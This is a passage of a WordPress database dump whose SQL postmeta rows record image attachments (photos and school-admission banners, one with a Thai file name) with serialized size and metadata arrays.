n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16828;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5628,2016,'_wp_attached_file','2025/09/546172095_1370758868383332_4437369802683811255_n.jpg'),
(5629,2016,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/546172095_1370758868383332_4437369802683811255_n.jpg\";s:8:\"filesize\";i:1749821;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"546172095_1370758868383332_4437369802683811255_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18101;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"546172095_1370758868383332_4437369802683811255_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128668;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"546172095_1370758868383332_4437369802683811255_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7933;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"546172095_1370758868383332_4437369802683811255_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80702;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"546172095_1370758868383332_4437369802683811255_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:234060;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"546172095_1370758868383332_4437369802683811255_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19857;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5630,2017,'_wp_attached_file','2025/09/545017562_1370758045050081_7816319960054490006_n.jpg'),
(5631,2017,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/545017562_1370758045050081_7816319960054490006_n.jpg\";s:8:\"filesize\";i:1670020;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"545017562_1370758045050081_7816319960054490006_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16533;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"545017562_1370758045050081_7816319960054490006_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124220;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"545017562_1370758045050081_7816319960054490006_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7346;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"545017562_1370758045050081_7816319960054490006_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76983;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"545017562_1370758045050081_7816319960054490006_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:230371;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"545017562_1370758045050081_7816319960054490006_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18361;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5632,2018,'_wp_attached_file','2025/09/545764562_1370757951716757_4501286291657514381_n.jpg'),
(5633,2018,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/545764562_1370757951716757_4501286291657514381_n.jpg\";s:8:\"filesize\";i:1675784;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"545764562_1370757951716757_4501286291657514381_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20329;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"545764562_1370757951716757_4501286291657514381_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136301;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"545764562_1370757951716757_4501286291657514381_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9150;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"545764562_1370757951716757_4501286291657514381_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87233;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"545764562_1370757951716757_4501286291657514381_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:244232;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"545764562_1370757951716757_4501286291657514381_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22501;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5634,2019,'_wp_attached_file','2025/09/545433805_1370757855050100_2960727026231077162_n.jpg'),
(5635,2019,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/545433805_1370757855050100_2960727026231077162_n.jpg\";s:8:\"filesize\";i:1824681;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"545433805_1370757855050100_2960727026231077162_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18074;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"545433805_1370757855050100_2960727026231077162_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133472;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"545433805_1370757855050100_2960727026231077162_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7927;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"545433805_1370757855050100_2960727026231077162_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83059;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"545433805_1370757855050100_2960727026231077162_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:247774;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"545433805_1370757855050100_2960727026231077162_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21062;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5636,2020,'_wp_attached_file','2025/09/546874841_1370757715050114_1059989753242858587_n.jpg'),
(5637,2020,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/546874841_1370757715050114_1059989753242858587_n.jpg\";s:8:\"filesize\";i:1604968;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"546874841_1370757715050114_1059989753242858587_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17770;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"546874841_1370757715050114_1059989753242858587_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118703;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"546874841_1370757715050114_1059989753242858587_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7843;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"546874841_1370757715050114_1059989753242858587_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75102;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"546874841_1370757715050114_1059989753242858587_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:214557;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"546874841_1370757715050114_1059989753242858587_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18170;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5638,2021,'_wp_attached_file','2025/09/546585466_1370756565050229_6814901706477756744_n.jpg'),
(5639,2021,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/546585466_1370756565050229_6814901706477756744_n.jpg\";s:8:\"filesize\";i:1626717;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"546585466_1370756565050229_6814901706477756744_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17841;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"546585466_1370756565050229_6814901706477756744_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119737;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"546585466_1370756565050229_6814901706477756744_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8342;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"546585466_1370756565050229_6814901706477756744_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75988;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"546585466_1370756565050229_6814901706477756744_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:219195;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"546585466_1370756565050229_6814901706477756744_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19571;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5640,2022,'_wp_attached_file','2025/09/545355085_1370755078383711_321736156690607878_n.jpg'),
(5641,2022,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:593;s:6:\"height\";i:395;s:4:\"file\";s:59:\"2025/09/545355085_1370755078383711_321736156690607878_n.jpg\";s:8:\"filesize\";i:46235;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"545355085_1370755078383711_321736156690607878_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17750;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"545355085_1370755078383711_321736156690607878_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8268;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"545355085_1370755078383711_321736156690607878_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17931;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5642,2023,'_wp_attached_file','2025/09/546713779_1370754925050393_7712748643539705091_n.jpg'),
(5643,2023,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/546713779_1370754925050393_7712748643539705091_n.jpg\";s:8:\"filesize\";i:1604227;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"546713779_1370754925050393_7712748643539705091_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19388;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"546713779_1370754925050393_7712748643539705091_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128768;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"546713779_1370754925050393_7712748643539705091_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8940;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"546713779_1370754925050393_7712748643539705091_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82672;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"546713779_1370754925050393_7712748643539705091_n-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:231791;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"546713779_1370754925050393_7712748643539705091_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20421;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5645,2002,'_edit_last','1'),
(5646,2002,'title_style','default'),
(5647,2002,'_title_style','field_5d1a0217cf408'),
(5648,2002,'related',''),
(5649,2002,'_related','field_603b51c3e183e'),
(5650,2024,'title_style','default'),
(5651,2024,'_title_style','field_5d1a0217cf408'),
(5652,2024,'related',''),
(5653,2024,'_related','field_603b51c3e183e'),
(5655,2026,'_wp_attached_file','2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png'),
(5656,2026,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:105:\"2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\";s:8:\"filesize\";i:280760;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:105:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-300x120.png\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29645;}s:5:\"large\";a:5:{s:4:\"file\";s:106:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1024x410.png\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:204208;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:105:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11837;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-768x307.png\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:128202;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:105:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-350x184.png\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41647;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5657,2027,'title_style','hidden'),
(5658,2027,'_title_style','field_5d1a0217cf408'),
(5660,2029,'_wp_attached_file','2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1.png'),
(5661,2029,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:107:\"2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1.png\";s:8:\"filesize\";i:280760;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:107:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1-300x120.png\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29645;}s:5:\"large\";a:5:{s:4:\"file\";s:108:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1-1024x410.png\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:204208;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:107:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11837;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:107:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1-768x307.png\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:128202;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:107:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1-350x184.png\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41647;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5662,2030,'title_style','hidden'),
(5663,2030,'_title_style','field_5d1a0217cf408'),
(5665,2032,'title_style','hidden'),
(5666,2032,'_title_style','field_5d1a0217cf408'),
(5668,2034,'title_style','hidden'),
(5669,2034,'_title_style','field_5d1a0217cf408'),
(5671,2036,'title_style','hidden'),
(5672,2036,'_title_style','field_5d1a0217cf408'),
(5674,2038,'_wp_attached_file','2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-2.png'),
(5675,2038,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:107:\"2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-2.png\";s:8:\"filesize\";i:280760;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:107:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-2-300x120.png\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29645;}s:5:\"large\";a:5:{s:4:\"file\";s:108:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-2-1024x410.png\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:204208;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:107:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11837;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:107:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-2-768x307.png\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:128202;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:107:\"Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-2-350x184.png\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41647;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5676,2039,'_wp_attached_file','2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png'),
(5677,2039,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1280;s:4:\"file\";s:170:\"2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\";s:8:\"filesize\";i:1315581;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:163:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33966;}s:5:\"large\";a:5:{s:4:\"file\";s:164:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-1024x512.png\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:259354;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:163:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14683;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:163:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-768x384.png\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:157897;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:164:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-1536x768.png\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:517070;}s:9:\"2048x2048\";a:5:{s:4:\"file\"